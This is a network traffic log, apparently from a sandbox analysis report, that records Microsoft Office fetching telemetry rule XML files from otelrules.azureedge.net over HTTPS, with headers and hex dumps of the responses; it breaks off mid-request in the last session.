                                  2024-11-12 15:42:21 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:22 UTC517INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:21 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1358
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                  ETag: "0x8DC582BE022ECC5"
                                  x-ms-request-id: 70b2909d-801e-00ac-33c1-2cfd65000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154221Z-16547b76f7fcrtpchC1DFW52e80000000fv000000000fssc
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:22 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  100192.168.2.44985313.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:21 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:22 UTC515INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:22 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1395
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                  ETag: "0x8DC582BDE12A98D"
                                  x-ms-request-id: 790f93ef-601e-003e-42a2-343248000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154222Z-15869dbbcc6lq2lzhC1DFWs1sn00000001ug00000000m7rs
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:22 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  101192.168.2.44985513.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:21 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:22 UTC515INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:22 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1389
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                  ETag: "0x8DC582BE10A6BC1"
                                  x-ms-request-id: 61156bc2-801e-008f-01a1-342c5d000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154222Z-15869dbbcc6j87jfhC1DFWr0yc000000084g000000009yk5
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:22 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  102192.168.2.44985613.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:22 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:22 UTC538INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:22 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1352
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                  ETag: "0x8DC582BE9DEEE28"
                                  x-ms-request-id: 96da997d-001e-0028-355d-2cc49f000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154222Z-16547b76f7fp46ndhC1DFW66zg0000000fw000000000dazw
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:22 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  103192.168.2.44985713.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:22 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:22 UTC538INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:22 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1405
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                  ETag: "0x8DC582BE12B5C71"
                                  x-ms-request-id: 3018d77d-101e-008d-49d2-2c92e5000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154222Z-16547b76f7fxdzxghC1DFWmf7n0000000fyg00000000b9tg
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:22 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  104192.168.2.44985813.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:22 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:22 UTC538INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:22 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1368
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                  ETag: "0x8DC582BDDC22447"
                                  x-ms-request-id: ddaecdfb-101e-0079-21d2-2c5913000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154222Z-16547b76f7fcjqqhhC1DFWrrrc0000000fxg000000000gen
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:22 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  105192.168.2.44985913.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:22 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:22 UTC494INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:22 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1401
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                  ETag: "0x8DC582BE055B528"
                                  x-ms-request-id: 21399fcf-c01e-008e-25a8-347381000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154222Z-17df447cdb5l865xhC1DFW9n7g0000000920000000007a0f
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:22 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  106192.168.2.44986013.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:23 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:23 UTC494INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:23 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1364
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                  ETag: "0x8DC582BE1223606"
                                  x-ms-request-id: 18f2d69b-e01e-0003-44a1-340fa8000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154223Z-17df447cdb528ltlhC1DFWnt1c0000000bx000000000dh3v
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:23 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  107192.168.2.44986113.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:23 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:23 UTC538INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:23 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1397
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                  ETag: "0x8DC582BE7262739"
                                  x-ms-request-id: 2ce7ce6f-901e-002a-1fd2-2c7a27000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154223Z-16547b76f7fdf69shC1DFWcpd00000000fug00000000359n
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:23 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  108192.168.2.44986213.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:23 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:23 UTC494INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:23 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1360
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                  ETag: "0x8DC582BDDEB5124"
                                  x-ms-request-id: a8f5521d-f01e-003f-49a0-34d19d000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154223Z-17df447cdb5vq4m4hC1DFW2t8w00000001fg00000000a34q
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:23 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  109192.168.2.44986313.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:23 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:23 UTC494INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:23 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1403
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                  ETag: "0x8DC582BDCB4853F"
                                  x-ms-request-id: 6a0cb2be-701e-0032-13a8-34a540000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154223Z-17df447cdb5c9wvxhC1DFWn08n0000000ckg000000006xac
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:23 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  110192.168.2.44986413.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:25 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
